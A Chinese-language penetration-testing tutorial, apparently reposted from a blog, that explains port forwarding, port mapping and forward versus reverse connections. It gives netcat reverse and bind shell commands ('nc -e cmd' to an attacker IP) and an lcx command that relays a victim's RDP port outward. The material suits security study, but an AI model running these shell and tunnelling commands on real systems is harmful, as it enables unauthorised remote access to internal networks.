端口转发&端口映射
0x01 什么是端口转发
端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH)为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局域网内部)上的一个端口。
普通话:端口转发就是将一个端口,这个端口可以本机的端口也可以是本机可以访问到的任意主机的端口,转发到任意一台可以访问到的IP上,通常这个IP是公网ip
0x02 什么是端口映射
端口映射是NAT的一种,功能是把在公网的地址转翻译成私有地址,
采用路由方式的ADSL宽带路由器拥有一个动态或固定的公网IP,ADSL直接接在HUB或交换机上,所有的电脑共享上网。
普通话:就是映射端口,就是将一个内网端口映射到公网上的某个端口,假设我自己的电脑是在内网中,没有公网
IP,但是我想提供一个端口供其他人使用,这就是端口映射
0x03 区分端口映射和端口转发
端口映射场景:
外网主机A想访问内网主机B上的服务
端口转发场景:
外网主机A已经可以任意内网主机B上的端口,但是无法访问内网主机C上的端口
此时可以将C主机的端口到B主机的端口,那么外网主机A访问B主机的某某端口就相当于访问了C主机的某某
总结:
端口转发和端口映射原理是一样的只不过是应用场景不一样,假如我们将本机的端口转发到远程主机端口,我们可以叫端口映射,也可以叫端口转发,看下图【注意图上文字】
我们如果把本机可以访问到的任意 IP
的端口转发到另外一台服务器的端口,我们叫他端口转发,看下图【注意图上文字】
0x04 区分正向连接和反向连接
- 正向连接:你的机器连接目标机器
- 反向连接:目标机器反连你的机器
- 不论映射,还是转发,都有正有反,原理相同
0x05 端口转发和代理工具
- Lcx
- Htran
- Netcat
0x06 环境拓扑图
A 主机W7
B 主机W7
C 主机XP
0x07 NC
NC 用法
2. NC反向连接-网络环境设想:
A外网 无法访问 内网B 【A为攻击者处于外网】
B内网 可以访问 外网A文章来源:https://www.toymoban.com/news/detail-720428.html
A:192.168.0.226
B:192.168.32.130
适合nc反向连接:也就将内网主机B shell反弹到 外网A
在外网主机A上执行:nc –nvlp 7777
在内网主机B上执行:nc –e cmd 192.168.0.226 7777
此处假装我连上了shell,并上传了nc
A主机处回显
3. NC正向连接-网络环境设想:
A内网 可以访问 外网B 【A为攻击者处于内网】
B外网 不能访问 内网A
适合nc正向连接:也就将内网主机A shell反弹到 外网B
在内网A 上执行 nc –l –p 5555 –e cmd .exe
在外网主机B上执行nc –nvv 192.168.0.226 5555
4. 阐述:
如果客户端【相当于内网】连接服务器【相当于外网】,想获取服务器的shell,那么称为正向shell,如果是客户端连接服务器,服务器端想获取客户端的shell,那么称为反向shell
NC是安全的瑞士军刀,太出名了,不光能反弹shell,端口转发,还能聊天等等
0x08 LCX
LCX用法:
LCX端口映射环境设想:
A外网 无法访问 内网B 【A为攻击者处于外网】
B内网 可以访问 外网A
在内网主机B上执行:lcx.exe –slave 192.168.0.226 7777 192.168.32.132 3389</文章来源地址https://www.toymoban.com/news/detail-720428.html
到了这里,关于内网渗透之端口转发、映射、代理的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!